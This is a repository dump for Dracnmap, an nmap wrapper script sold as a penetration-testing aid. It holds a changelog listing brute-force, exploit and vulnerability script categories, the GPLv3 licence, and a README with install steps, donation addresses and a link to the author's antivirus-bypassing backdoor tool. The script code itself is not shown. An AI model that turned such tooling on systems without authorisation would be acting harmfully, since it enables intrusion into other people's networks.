├── CHANGELOG.md ├── LICENSE ├── Output └── log ├── README.md ├── dracnmap-v2.2-dracOs.sh └── dracnmap-v2.2.sh /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | * v2.2 - add multi task in dracnmap when scan 2 | * v2.2 - the output file will be in root / on folder dracnmap 3 | * v2.1 - Fixed bug ( typo and double function ) 4 | * v2.0 - Changed a banner 5 | * v2.0 - added auth-category (34 OPTIONAL) in to nmap script engine Advanced 6 | * v2.0 - added broadcast-category (44 OPTIONAL) in to nmap script engine Advanced 7 | * v2.0 - added brute-category (71 OPTIONAL) in to nmap script engine Advanced 8 | * v2.0 - added exploit-category (44 OPTIONAL) in to nmap script engine Advanced 9 | * v2.0 - added fuzzer-category (4 OPTIONAL)in to nmap script engine Advanced 10 | * v2.0 - added malware-category (10 OPTIONAL) in to nmap script engine Advanced 11 | * v2.0 - added vuln-category (89 OPTIONAL)in to nmap script engine Advanced 12 | * v2.0 - Delete future bruteforce with nse script & Changed to Nmap Script Engine Advanced with sub optional 13 | * v1.3 - Add 70 Bruteforce with nse script :)) 14 | * v1.2 - Add dracnmap for dracos 15 | * v1.2 - Fix some functoin 16 | * v1.1 - Collecting Valid Email Accounts with nse Script ( WEB SERVICE ) 17 | * V1.1 - Add Gathering information from WHOIS ( MENU WEB SERVICE ) 18 | * V1.1 - Add Geolocation ip addres with nse script ( MENU WEB SERVICE ) 19 | * v1.0 - Release Dracnmap 20 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | {one line to give the program's name and a brief idea of what it does.} 635 | Copyright (C) {year} {name of author} 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | {project} Copyright (C) {year} {fullname} 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /Output/log: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # What is Dracnmap ? 2 | 3 | [![Version](https://img.shields.io/badge/Dracnmap-2.2.0-brightgreen.svg?maxAge=259200)]() 4 | [![Version](https://img.shields.io/badge/Codename-Redline-red.svg?maxAge=259200)]() 5 | [![Stage](https://img.shields.io/badge/Release-Stable-brightgreen.svg)]() 6 | [![Build](https://img.shields.io/badge/Supported_OS-Linux-orange.svg)]() 7 | 8 | Dracnmap is an open source program which is using to exploit the network and gathering information with nmap help. 9 | Nmap command comes with lots of options that can make the utility more robust and difficult to follow for new users. 10 | Hence Dracnmap is designed to perform fast scaning with the utilizing script engine of nmap and nmap can perform various automatic scanning techniques with the advanced commands. 11 | 12 | ### Donate 13 | - If this project very help you to penetration testing and u want support me , you can give me a cup of coffee :) 14 | - [![Donation](https://img.shields.io/badge/bitcoin-donate-yellow.svg)](https://blockchain.info/id/address/1NuNTXo7Aato7XguFkvwYnTAFV2immXmjS) 15 | 16 | # Screenshot 17 | 18 | # ----------------------------------------------------------------------- 19 | 20 | 21 | 22 | ## :scroll: Changelog 23 | Be sure to check out the [Changelog] and Read CHANGELOG.md 24 | 25 | 26 | ## Getting Started 27 | 1. ```git clone https://github.com/Screetsec/Dracnmap.git``` 28 | 2. ```cd Dracnmap``` 29 | 3. ```chmod +x Dracnmap.sh ``` 30 | 3. ```sudo ./Dracnmap.sh or sudo su ./Dracnmap.sh ``` 31 | 32 | ## :heavy_exclamation_mark: Requirements 33 | 34 | - A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling / Cyborg / Parrot / Dracos / BackTrack / Backbox / and another operating system ( linux ) 35 | 36 | - Must install nmap 37 | 38 | ## Tutorial ? or another tool ? 39 | 40 | you can visit my channel : https://www.youtube.com/channel/UCpK9IXzLMfVFp9NUfDzxFfw 41 | 42 | thefatrat , Backdoor Creator ( bypass av ) : https://github.com/Screetsec/TheFatRat 43 | 44 | ## BUG ? 45 | - Please Submit new issue 46 | - Contact me 47 | - Hey sup ? do you want ask about all my tools ? you can join me in telegram.me/offscreetsec 48 | 49 | ## Donations 50 | 51 | - Donation: Send to [bitcoin](https://blockchain.info/id/address/1NuNTXo7Aato7XguFkvwYnTAFV2immXmjS) 52 | 53 | - Addres Bitcoin : 1NuNTXo7Aato7XguFkvwYnTAFV2immXmjS 54 | 55 | - 56 | 57 | ## :octocat: Credits 58 | 59 | - Thanks to allah and Screetsec [ Edo -maland- ] 60 | - First Contribute @nullrndtx 61 | - Dracos Linux from Scratch Indonesia ( Awesome Penetration os ), you can see in http://dracos-linux.org/ 62 | - Offensive Security for the awesome OS ( http://www.offensive-security.com/ ) 63 | - http://www.kali.org/" 64 | - And another open sources tool in github 65 | - Uptodate new tools hacking visit http://www.kitploit.com 66 | - Contribute Boy Suganda Sinaga [ dragz17 ] 67 | 68 | ## Book for nmap 69 | 70 | - Nmap 6: Network exploration and security auditing Cookbook 71 | - Nmap Host 